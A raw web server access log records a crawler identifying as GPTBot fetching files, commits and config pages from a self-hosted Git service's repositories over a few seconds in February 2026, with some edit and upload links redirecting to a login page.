GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11600] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11009] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13337] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11597] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10445] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13339] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13338] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11597] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:59:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:59:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache?display=source" [Client 74.7.227.38] [Length 12217] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:16:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache?display=source" [Client 74.7.227.38] [Length 12208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" -[17/Feb/2026:16:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" -[17/Feb/2026:16:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=mostissues&state=open" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" -[17/Feb/2026:16:00:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fProperties" [Client 74.7.227.38] [Length 21741] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties" -[17/Feb/2026:16:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor" [Client 74.7.227.38] [Length 13083] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:16:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13094] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:00:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:16:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor" -[17/Feb/2026:16:00:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:16:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor" -[17/Feb/2026:16:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor" [Client 74.7.227.38] [Length 10435] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:16:00:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:16:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresMonitor" -[17/Feb/2026:16:00:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:16:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:16:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12437] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:16:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/instrument.png?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" -[17/Feb/2026:16:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm" [Client 74.7.227.38] [Length 23387] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" -[17/Feb/2026:16:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 